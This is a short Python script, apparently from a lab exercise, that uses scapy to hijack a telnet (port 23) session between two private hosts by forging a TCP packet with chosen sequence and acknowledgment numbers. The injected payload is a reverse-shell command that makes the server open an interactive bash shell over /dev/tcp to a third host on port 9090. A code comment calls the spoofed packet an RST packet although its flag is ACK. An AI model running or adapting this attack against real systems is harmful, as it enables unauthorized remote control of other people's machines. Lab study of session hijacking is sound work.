#!/usr/bin/python3
from scapy.all import *

# Define IP and TCP header fields
ip = IP(src="192.168.182.138", dst="192.168.182.141")   # source IP is the client IP , destination IP is the server IP
tcp = TCP(sport=54568, dport=23, seq=2357682095, ack=2932820656, flags="A") # source port should be checked, destination port should be 23, check last TCP packet for the next sequence number

# Data to be injected
data = "\r/bin/bash -i > /dev/tcp/192.168.182.132/9090 2>&1 0<&1\n\r"

# Construct the RST packet
pkt = ip/tcp/data

# Display the packet structure for debugging
ls(pkt)

# Send the packet
send(pkt, verbose=0)
